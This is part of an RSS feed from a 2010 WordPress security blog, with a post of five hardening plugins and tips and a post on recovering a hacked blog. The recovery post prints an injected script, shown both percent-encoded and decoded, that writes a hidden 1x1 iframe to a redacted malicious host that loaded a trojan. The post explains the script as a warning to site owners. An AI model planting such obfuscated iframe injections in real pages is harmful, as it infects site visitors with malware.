		<li class="shr-googlebuzz">
			<a href="http://www.shareaholic.com/api/share/?title=Secure+Your+WordPress+Blog+Against+Malicious+URL+Requests&amp;link=http://samswebguide.com/2010/04/18/secure-wordpress-against-malicious-url-request/&amp;notes=As%20I%20continue%20the%20series%20of%20techniques%20to%20secure%20and%20protect%20your%20WordPress%20blog%2C%20today%20I%20will%20be%20showing%20you%20how%20to%20protect%20your%20WordPress%20installation%20specifically%20against%20Malicious%20URL%20Requests%20that%20inject%20code%20to%20exploit%20your%20theme%27s%20files%20and%20MySQL%20database.%0D%0A%0D%0AIf%20you%20missed%20my%20previous%20securit&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=257&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=Secure+Your+WordPress+Blog+Against+Malicious+URL+Requests&amp;link=http://samswebguide.com/2010/04/18/secure-wordpress-against-malicious-url-request/&amp;notes=As%20I%20continue%20the%20series%20of%20techniques%20to%20secure%20and%20protect%20your%20WordPress%20blog%2C%20today%20I%20will%20be%20showing%20you%20how%20to%20protect%20your%20WordPress%20installation%20specifically%20against%20Malicious%20URL%20Requests%20that%20inject%20code%20to%20exploit%20your%20theme%27s%20files%20and%20MySQL%20database.%0D%0A%0D%0AIf%20you%20missed%20my%20previous%20securit&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=Secure+Your+WordPress+Blog+Against+Malicious+URL+Requests&amp;link=http://samswebguide.com/2010/04/18/secure-wordpress-against-malicious-url-request/&amp;notes=As%20I%20continue%20the%20series%20of%20techniques%20to%20secure%20and%20protect%20your%20WordPress%20blog%2C%20today%20I%20will%20be%20showing%20you%20how%20to%20protect%20your%20WordPress%20installation%20specifically%20against%20Malicious%20URL%20Requests%20that%20inject%20code%20to%20exploit%20your%20theme%27s%20files%20and%20MySQL%20database.%0D%0A%0D%0AIf%20you%20missed%20my%20previous%20securit&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=Secure+Your+WordPress+Blog+Against+Malicious+URL+Requests&amp;link=http://samswebguide.com/2010/04/18/secure-wordpress-against-malicious-url-request/&amp;notes=As%20I%20continue%20the%20series%20of%20techniques%20to%20secure%20and%20protect%20your%20WordPress%20blog%2C%20today%20I%20will%20be%20showing%20you%20how%20to%20protect%20your%20WordPress%20installation%20specifically%20against%20Malicious%20URL%20Requests%20that%20inject%20code%20to%20exploit%20your%20theme%27s%20files%20and%20MySQL%20database.%0D%0A%0D%0AIf%20you%20missed%20my%20previous%20securit&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=Secure+Your+WordPress+Blog+Against+Malicious+URL+Requests&amp;link=http://samswebguide.com/2010/04/18/secure-wordpress-against-malicious-url-request/&amp;notes=As%20I%20continue%20the%20series%20of%20techniques%20to%20secure%20and%20protect%20your%20WordPress%20blog%2C%20today%20I%20will%20be%20showing%20you%20how%20to%20protect%20your%20WordPress%20installation%20specifically%20against%20Malicious%20URL%20Requests%20that%20inject%20code%20to%20exploit%20your%20theme%27s%20files%20and%20MySQL%20database.%0D%0A%0D%0AIf%20you%20missed%20my%20previous%20securit&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=Secure+Your+WordPress+Blog+Against+Malicious+URL+Requests&amp;link=http://samswebguide.com/2010/04/18/secure-wordpress-against-malicious-url-request/&amp;notes=As%20I%20continue%20the%20series%20of%20techniques%20to%20secure%20and%20protect%20your%20WordPress%20blog%2C%20today%20I%20will%20be%20showing%20you%20how%20to%20protect%20your%20WordPress%20installation%20specifically%20against%20Malicious%20URL%20Requests%20that%20inject%20code%20to%20exploit%20your%20theme%27s%20files%20and%20MySQL%20database.%0D%0A%0D%0AIf%20you%20missed%20my%20previous%20securit&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-blogengage">
			<a href="http://www.shareaholic.com/api/share/?title=Secure+Your+WordPress+Blog+Against+Malicious+URL+Requests&amp;link=http://samswebguide.com/2010/04/18/secure-wordpress-against-malicious-url-request/&amp;notes=As%20I%20continue%20the%20series%20of%20techniques%20to%20secure%20and%20protect%20your%20WordPress%20blog%2C%20today%20I%20will%20be%20showing%20you%20how%20to%20protect%20your%20WordPress%20installation%20specifically%20against%20Malicious%20URL%20Requests%20that%20inject%20code%20to%20exploit%20your%20theme%27s%20files%20and%20MySQL%20database.%0D%0A%0D%0AIf%20you%20missed%20my%20previous%20securit&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=286&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Engage with this article!">Engage with this article!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://samswebguide.com/2010/04/18/secure-wordpress-against-malicious-url-request/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>5 Additional Extreme Steps to Secure Your WordPress Blog</title>
		<link>http://samswebguide.com/2010/04/11/5-additional-extreme-steps-to-secure-your-wordpress-blog/</link>
		<comments>http://samswebguide.com/2010/04/11/5-additional-extreme-steps-to-secure-your-wordpress-blog/#comments</comments>
		<pubDate>Mon, 12 Apr 2010 03:11:30 +0000</pubDate>
		<dc:creator>Sam</dc:creator>
				<category><![CDATA[Blogging & SEO]]></category>
		<category><![CDATA[Other Tutorials]]></category>
		<category><![CDATA[Security Tutorials]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[internet security]]></category>
		<category><![CDATA[plugins]]></category>
		<category><![CDATA[protection]]></category>
		<category><![CDATA[simple]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://samswebguide.com/?p=598</guid>
		<description><![CDATA[You can never be too prepared when it comes to internet security, so I have posted a continuation of my previous post,  10 Simple Steps to Secure &#38; Protect your WordPress Blog, with an additional 5 tips to make it 10 times more difficult for your WordPress site to be compromised by hackers. Here are ...]]></description>
			<content:encoded><![CDATA[<p>You can never be too prepared when it comes to internet security, so I have posted a continuation of my previous post,  <a href="http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/" target="_blank">10 Simple Steps to Secure &amp; Protect your WordPress Blog</a>, with an additional 5 tips to make it 10 times more difficult for your WordPress site to be compromised by hackers.</p>
<p>Here are 5 additional tips and practices to ensure that your investment of time, energy and money in your blog never goes to waste.</p>
<p><span id="more-598"></span></p>
<h3><span style="color: #333399;"><strong>1. WordPress File Monitor Plugin</strong></span></h3>
<p>This plugin monitors your WordPress installation and sends an e-mail alert to a specified address whenever a file is changed, added or deleted. Usually when a site or blog is hacked or compromised in some way, there is always a file that is altered in your directories. Under normal circumstances we would not know about such low-key changes taking places, so the plugin keeps a constant look-out and reports any changes.</p>
<p>The plugin also shows alerts in the WordPress dashboard, just in case you missed the e-mail alert.</p>
<p>This plugin can be downloaded here: <a href="http://wordpress.org/extend/plugins/wordpress-file-monitor/" target="_blank">WordPress File Monitor</a></p>
<h3><span style="color: #333399;">2. Move Your Wp-config.php File</span></h3>
<p>This tip actually came from <a href="http://www.webdesign-bureau-of-mauritius.com/" target="_blank">Sachin</a>, a fellow blogger and web developer, who commented on my <a href="http://samswebguide.com/2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/" target="_blank">previous security post</a>.</p>
<p>You can further secure your WordPress blog by moving your wp-config.php file (which is found in your root directory) to a directory level that is higher than your www (root) folder. This move will prevent your blog from being hacked through your wp-config.php file.</p>
<h3><strong><span style="color: #333399;">3. WordPress Anti-Virus Protection Plugin<br />
</span></strong></h3>
<p>Hopefully, most of us have anti-virus software for our personal computers, so why not have it for your wordpress blog? This plugin is an extremely effective solution for detecting and protecting your blog against exploitations and spam injections and offers the ability to conduct daily automatic scanning and manual testing while providing e-mail notifications.</p>
<p>This awesome anti-virus plugin can be downloaded here: <a title="Wordpress Anti-Virus" href="http://wordpress.org/extend/plugins/antivirus/" target="_blank">WordPress AntiVirus</a></p>
<h3><strong><span style="color: #333399;">4. WordPress Firewall Plugin</span></strong></h3>
<p>This one is pretty neat and recommended for more advanced users. This plugin has a vast amount features that complement your web host server by logging, detecting and intercepting suspicious parameters and requests. It is also useful for mitigating dreadful zero-day attacks (<a title="Zero Day Attacks" href="http://en.wikipedia.org/wiki/Zero_day_attack" target="_blank">See definition for Zero-day Attacks Here</a>) and setting different security protection levels.</p>
<p>The plugin can be downloaded here: <a title="Wordpress Firewall Plugin" href="http://www.seoegghead.com/software/wordpress-firewall.seo" target="_blank">WordPress Firewall Plugin</a></p>
<h3><span style="color: #333399;"><strong>5. Encrypted Login Password Plugin</strong></span></h3>
<p>This plugin is very useful for users who do not have SSL (<a title="SSL Definition" href="http://info.ssl.com/article.aspx?id=10241" target="_blank">Secure Sockets Layer, see definition here</a>) enabled or is not available. The plugin increases the security of the login process by using a combination of public and secret key encryption to encrypt the password on the client side when you log in. Your server will then decrypt the encrypted password with a private key and grant you access. <strong>Note:</strong> Javascript is required to enable password encryption.</p>
<p>The plugin can be downloaded here: <a href="http://wordpress.org/extend/plugins/semisecure-login-reimagined/" target="_blank">Semisecure Login Reimagined</a></p>
<p>Use the plugins and tips above to seriously secure and lock-up your wordpress blog to the Max! Remember, its your investment, so do what it takes to protect it.</p>
<p><span style="color: #333399;"><strong>Discussion:</strong></span></p>
<p>Please share with us other tips or plugins not listed above that you may have found useful. Also, please share any experiences or difficulties you may have had in the past and what you did to overcome.</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-knowledge">
<ul class="socials">
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=5+Additional+Extreme+Steps+to+Secure+Your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/04/11/5-additional-extreme-steps-to-secure-your-wordpress-blog/&amp;notes=You%20can%20never%20be%20too%20prepared%20when%20it%20comes%20to%20internet%20security%2C%20so%20I%20have%20posted%20a%20continuation%20of%20my%20previous%20post%2C%C2%A0%2010%20Simple%20Steps%20to%20Secure%20%26amp%3B%20Protect%20your%20Wordpress%20Blog%2C%20with%20an%20additional%205%20tips%20to%20make%20it%2010%20times%20more%20difficult%20for%20your%20WordPress%20site%20to%20be%20compromised%20by%20hackers.%0D%0A%0D%0A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%2524%257Btitle%257D%2B-%2B%2524%257Bshort_link%257D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=5+Additional+Extreme+Steps+to+Secure+Your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/04/11/5-additional-extreme-steps-to-secure-your-wordpress-blog/&amp;notes=You%20can%20never%20be%20too%20prepared%20when%20it%20comes%20to%20internet%20security%2C%20so%20I%20have%20posted%20a%20continuation%20of%20my%20previous%20post%2C%C2%A0%2010%20Simple%20Steps%20to%20Secure%20%26amp%3B%20Protect%20your%20Wordpress%20Blog%2C%20with%20an%20additional%205%20tips%20to%20make%20it%2010%20times%20more%20difficult%20for%20your%20WordPress%20site%20to%20be%20compromised%20by%20hackers.%0D%0A%0D%0A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.shareaholic.com/api/share/?title=5+Additional+Extreme+Steps+to+Secure+Your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/04/11/5-additional-extreme-steps-to-secure-your-wordpress-blog/&amp;notes=You%20can%20never%20be%20too%20prepared%20when%20it%20comes%20to%20internet%20security%2C%20so%20I%20have%20posted%20a%20continuation%20of%20my%20previous%20post%2C%C2%A0%2010%20Simple%20Steps%20to%20Secure%20%26amp%3B%20Protect%20your%20Wordpress%20Blog%2C%20with%20an%20additional%205%20tips%20to%20make%20it%2010%20times%20more%20difficult%20for%20your%20WordPress%20site%20to%20be%20compromised%20by%20hackers.%0D%0A%0D%0A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=257&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-delicious">
			<a href="http://www.shareaholic.com/api/share/?title=5+Additional+Extreme+Steps+to+Secure+Your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/04/11/5-additional-extreme-steps-to-secure-your-wordpress-blog/&amp;notes=You%20can%20never%20be%20too%20prepared%20when%20it%20comes%20to%20internet%20security%2C%20so%20I%20have%20posted%20a%20continuation%20of%20my%20previous%20post%2C%C2%A0%2010%20Simple%20Steps%20to%20Secure%20%26amp%3B%20Protect%20your%20Wordpress%20Blog%2C%20with%20an%20additional%205%20tips%20to%20make%20it%2010%20times%20more%20difficult%20for%20your%20WordPress%20site%20to%20be%20compromised%20by%20hackers.%0D%0A%0D%0A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=2&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.shareaholic.com/api/share/?title=5+Additional+Extreme+Steps+to+Secure+Your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/04/11/5-additional-extreme-steps-to-secure-your-wordpress-blog/&amp;notes=You%20can%20never%20be%20too%20prepared%20when%20it%20comes%20to%20internet%20security%2C%20so%20I%20have%20posted%20a%20continuation%20of%20my%20previous%20post%2C%C2%A0%2010%20Simple%20Steps%20to%20Secure%20%26amp%3B%20Protect%20your%20Wordpress%20Blog%2C%20with%20an%20additional%205%20tips%20to%20make%20it%2010%20times%20more%20difficult%20for%20your%20WordPress%20site%20to%20be%20compromised%20by%20hackers.%0D%0A%0D%0A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=38&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-digg">
			<a href="http://www.shareaholic.com/api/share/?title=5+Additional+Extreme+Steps+to+Secure+Your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/04/11/5-additional-extreme-steps-to-secure-your-wordpress-blog/&amp;notes=You%20can%20never%20be%20too%20prepared%20when%20it%20comes%20to%20internet%20security%2C%20so%20I%20have%20posted%20a%20continuation%20of%20my%20previous%20post%2C%C2%A0%2010%20Simple%20Steps%20to%20Secure%20%26amp%3B%20Protect%20your%20Wordpress%20Blog%2C%20with%20an%20additional%205%20tips%20to%20make%20it%2010%20times%20more%20difficult%20for%20your%20WordPress%20site%20to%20be%20compromised%20by%20hackers.%0D%0A%0D%0A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=3&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-reddit">
			<a href="http://www.shareaholic.com/api/share/?title=5+Additional+Extreme+Steps+to+Secure+Your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/04/11/5-additional-extreme-steps-to-secure-your-wordpress-blog/&amp;notes=You%20can%20never%20be%20too%20prepared%20when%20it%20comes%20to%20internet%20security%2C%20so%20I%20have%20posted%20a%20continuation%20of%20my%20previous%20post%2C%C2%A0%2010%20Simple%20Steps%20to%20Secure%20%26amp%3B%20Protect%20your%20Wordpress%20Blog%2C%20with%20an%20additional%205%20tips%20to%20make%20it%2010%20times%20more%20difficult%20for%20your%20WordPress%20site%20to%20be%20compromised%20by%20hackers.%0D%0A%0D%0A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=40&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-linkedin">
			<a href="http://www.shareaholic.com/api/share/?title=5+Additional+Extreme+Steps+to+Secure+Your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/04/11/5-additional-extreme-steps-to-secure-your-wordpress-blog/&amp;notes=You%20can%20never%20be%20too%20prepared%20when%20it%20comes%20to%20internet%20security%2C%20so%20I%20have%20posted%20a%20continuation%20of%20my%20previous%20post%2C%C2%A0%2010%20Simple%20Steps%20to%20Secure%20%26amp%3B%20Protect%20your%20Wordpress%20Blog%2C%20with%20an%20additional%205%20tips%20to%20make%20it%2010%20times%20more%20difficult%20for%20your%20WordPress%20site%20to%20be%20compromised%20by%20hackers.%0D%0A%0D%0A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=88&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="shr-blogengage">
			<a href="http://www.shareaholic.com/api/share/?title=5+Additional+Extreme+Steps+to+Secure+Your+Wordpress+Blog&amp;link=http://samswebguide.com/2010/04/11/5-additional-extreme-steps-to-secure-your-wordpress-blog/&amp;notes=You%20can%20never%20be%20too%20prepared%20when%20it%20comes%20to%20internet%20security%2C%20so%20I%20have%20posted%20a%20continuation%20of%20my%20previous%20post%2C%C2%A0%2010%20Simple%20Steps%20to%20Secure%20%26amp%3B%20Protect%20your%20Wordpress%20Blog%2C%20with%20an%20additional%205%20tips%20to%20make%20it%2010%20times%20more%20difficult%20for%20your%20WordPress%20site%20to%20be%20compromised%20by%20hackers.%0D%0A%0D%0A&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=286&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Engage with this article!">Engage with this article!</a>
		</li>
</ul><div style="clear: both;"></div><div class="shr-getshr" style="visibility:hidden;font-size:10px !important"><a target="_blank" href="http://www.shareaholic.com/?src=pub">Get Shareaholic</a></div><div style="clear: both;"></div></div>

]]></content:encoded>
			<wfw:commentRss>http://samswebguide.com/2010/04/11/5-additional-extreme-steps-to-secure-your-wordpress-blog/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>Have You Ever Been Hacked? Simple Mistakes to Avoid &amp; How to Recover</title>
		<link>http://samswebguide.com/2010/03/26/have-you-ever-been-hacked-simple-mistakes-to-avoid-how-to-recover/</link>
		<comments>http://samswebguide.com/2010/03/26/have-you-ever-been-hacked-simple-mistakes-to-avoid-how-to-recover/#comments</comments>
		<pubDate>Fri, 26 Mar 2010 20:55:57 +0000</pubDate>
		<dc:creator>Sam</dc:creator>
				<category><![CDATA[Blogging & SEO]]></category>
		<category><![CDATA[Other Tutorials]]></category>
		<category><![CDATA[Security Tutorials]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[html]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[prevention]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://samswebguide.com/?p=478</guid>
		<description><![CDATA[WordPress is the most popular blogging platform in the world with over 6 Million downloads so far (See why I like wordpress here) and because its so popular, you know the bad guys will begin to target its users. Hacking is a very serious issue that can cripple any website and erase a hard earned ...]]></description>
			<content:encoded><![CDATA[<p>WordPress is the most popular blogging platform in the world with over 6 Million downloads so far (<a title="Best Blogging Platform" href="http://samswebguide.com/2010/02/26/wordpress-the-best-content-management-system-cms-for-my-blog/" target="_blank">See why I like wordpress here</a>) and because its so popular, you know the bad guys will begin to target its users. Hacking is a very serious issue that can cripple any website and erase a hard earned source of income, especially for the unsuspecting. The thing about it is many of us have never witnessed the devastating effects that malicious scripts can have on a website, so I&#8217;m going to show you an example of what happens when hackers attack and how to deal with it.</p>
<p><span id="more-478"></span></p>
<p>Fortunately, I have never been hacked, so I will be showing an example from another person&#8217;s experience that I came across yesterday. Below is a screenshot of his wordpress dashboard 2 months after the malicious script was installed.</p>
<div id="attachment_487" class="wp-caption aligncenter" style="width: 530px"><img class="size-full wp-image-487" title="Hacked WordPress Screenshot" src="http://samswebguide.com/wp-content/uploads/2010/03/hacked-screenshot.jpg" alt="Hacked WordPress Screenshot" width="520" height="394" /><p class="wp-caption-text">Hacked WordPress Screenshot</p></div>
<p style="text-align: center;">
<p>As you can see, everything&#8217;s all mixed up. When he tried to visit his blog through his web browser, his anti-virus software popped up with warnings that a trojan horse was found on the site and the site may be dangerous. This is when he realized that something had gone wrong; after the damage was already done.</p>
<h3><span style="color: #993300;">The Malicious Code</span></h3>
<p>He then decided to check his theme&#8217;s html files to find the source of the problem and here he found some code that he did not recognize because the malicious code was encrypted. Example below:</p>
<p><em>&lt;script language=”javascript”&gt;<strong>eval(unescape(“%64%6F%63%75%6D%65</strong></em></p>
<p>The hackers obviously encrypted a part of the line of code hoping to hide the true nature and purpose of the script. When decoded the code reads as follows:</p>
<p><em>&lt;script  language=”javascript”&gt;eval(unescape(“document.write(‘&lt;iframe  src=”http://xxxxxxxx.org/in.php” width=1 height=1  frameborder=0&gt;&lt;/iframe&gt;’);”))&lt;/script&gt;</em></p>
<p>The script was actually trying to call a malicious website to load on his website through a hidden frame. This website would automatically load a trojan horse virus in the his browser.<em> </em></p>
<h3><span style="color: #993300;">How Did The Script Get in the Html for his Blog?</span></h3>
<p>The next question is; how did this malicious code get into his blog in the first place? Answer: A virus on his local windows PC stole his FTP login credentials from his FTP client and then used the FTP client to remotely infect the site, considering that he used his FTP to directly access his blog&#8217;s directories. Typically, the php files with execution permission within the directories were infected, especially the plugin and theme files are the first targets.</p>
<h3><span style="color: #993300;">The Solution</span></h3>
<p>Here are some steps to take to remove an infestation:</p>
<p>1) Ensure that you have a robust anti-virus software on your PC that is updated. Run a complete scan of your entire computer system and ensure that all viruses are removed. I would recommend downloading <a title="Malwarebytes' Anti-Malware" href="http://www.malwarebytes.org/" target="_blank">Malwarebytes&#8217; Anti-Malware Software</a> to compliment your anti-virus software. This works very well.</p>
<p>2) In this scenario, it was only the default wordpress php files that were affected, so a fresh copy of the files were uploaded after removing the malicious ones from the hosting server.</p>
<p>3) <span style="color: #993300;"><span style="color: #000000;"> </span></span>Change local FTP passwords and ensure that the new ones are very complex. This is very important to do because normally after a malicious attack there is always an open &#8220;backdoor&#8221; that remains and the hacker can easily exploit this.</p>
<p>4) To be on the safe side, change your hosting account&#8217;s password as well as your site&#8217;s database password, whether it is Postgre or MySQL.</p>
<h3><span style="color: #993300;">PHP &amp; HTML Knowledge</span></h3>
<p>It is very important to know basic html and php because this will give you the benefit of recognizing suspicious activity and malicious code and I can&#8217;t stress this enough. A site such as <a title="Lynda Software Training" href="http://www.lynda.com" target="_blank">Lynda.com</a> provides amazing video tutorials that will definitely help you to grasp the basics and master programming languages if you&#8217;re seriously interested. They have helped me a lot.</p>
<h3><span style="color: #993300;">Prevention is Better Than Cure</span></h3>
<p>You may view a list of plugins and techniques that will help to prevent malicious attacks on one of my previous posts here: <span style="color: #000000;"><a href="../2010/03/20/10-simple-steps-to-secure-protect-your-wordpress-blog/">10  Simple Steps to Secure &amp; Protect your WordPress Blog</a></span></p>
<p><span style="color: #000000;">Some key points that are not in that post are:</span></p>
<p><span style="color: #000000;">1) </span>Do not save your login credentials in your FTP client.</p>
<p>2) Change all passwords on a monthly basis</p>
<p>3) Be carefull when downloading free plugins. It is best to download them from <a title="Free WordPress PLugins" href="http://wordpress.org/extend/plugins/" target="_blank">wordpress.org</a>.</p>
<p>4) Keep your anti-virus software updated</p>
<p>Please note that if your blog gets hacked, the symptoms and the  causes may be different from what had happened in the scenario described above..</p>
<p>If your wordpress blog gets hacked, don’t panic. Use the following  resources to recover your website:</p>
<h3><span style="color: #993300;">Additional Resources if you Suspect That You May Be Hacked</span></h3>
<p>1) Use <a title="Google Webmaster Tools - Malicious Code Detector" href="http://www.google.com/webmasters" target="_blank">Google Webmaster Tools</a> to detect malicious scripts.</p>
<p>2) Post the details of symptoms to 	the <a href="http://wordpress.org/support/" target="_blank">WordPress Community</a>, if you  notice any suspicious activities happening in your blog</p>
<p>3) If you decide to clean it up 	yourself, there is a good list of  steps to take, in <a href="http://codex.wordpress.org/FAQ_My_site_was_hacked" target="_blank">an article at  WordPress.org Codex</a>.</p>
<p>Please note that if your blog or other type of site gets hacked, the symptoms and the causes  may be different from what had happened in the scenario I presented.</p>
<p>I hope you found this post helpful and will take the steps to prevent the exploitation of your site / blog.</p>
<p><strong><span style="color: #000080;">Discussion: Have you ever been hacked? Leave a comment and tell us of your experiences. If you would like to have a more in-depth discussion on this topic, feel free to <a title="Contact Robyn" href="http://samswebguide.com/contact-sam/" target="_blank">contact me through here</a>.</span></strong></p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-knowledge">
<ul class="socials">
		<li class="shr-twitter">
			<a href="http://www.shareaholic.com/api/share/?title=Have+You+Ever+Been+Hacked%3F+Simple+Mistakes+to+Avoid+%26+How+to+Recover&amp;link=http://samswebguide.com/2010/03/26/have-you-ever-been-hacked-simple-mistakes-to-avoid-how-to-recover/&amp;notes=WordPress%20is%20the%20most%20popular%20blogging%20platform%20in%20the%20world%20with%20over%206%20Million%20downloads%20so%20far%20%28See%20why%20I%20like%20wordpress%20here%29%20and%20because%20its%20so%20popular%2C%20you%20know%20the%20bad%20guys%20will%20begin%20to%20target%20its%20users.%20Hacking%20is%20a%20very%20serious%20issue%20that%20can%20cripple%20any%20website%20and%20erase%20a%20hard%20earned%20sou&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=%2524%257Btitle%257D%2B-%2B%2524%257Bshort_link%257D&amp;service=7&amp;tags=&amp;ctype=" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.shareaholic.com/api/share/?title=Have+You+Ever+Been+Hacked%3F+Simple+Mistakes+to+Avoid+%26+How+to+Recover&amp;link=http://samswebguide.com/2010/03/26/have-you-ever-been-hacked-simple-mistakes-to-avoid-how-to-recover/&amp;notes=WordPress%20is%20the%20most%20popular%20blogging%20platform%20in%20the%20world%20with%20over%206%20Million%20downloads%20so%20far%20%28See%20why%20I%20like%20wordpress%20here%29%20and%20because%20its%20so%20popular%2C%20you%20know%20the%20bad%20guys%20will%20begin%20to%20target%20its%20users.%20Hacking%20is%20a%20very%20serious%20issue%20that%20can%20cripple%20any%20website%20and%20erase%20a%20hard%20earned%20sou&amp;short_link=&amp;shortener=none&amp;shortener_key=&amp;v=1&amp;apitype=1&amp;apikey=8afa39428933be41f8afdb8ea21a495c&amp;source=Shareaholic&amp;template=&amp;service=5&amp;tags=&amp;ctype=" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
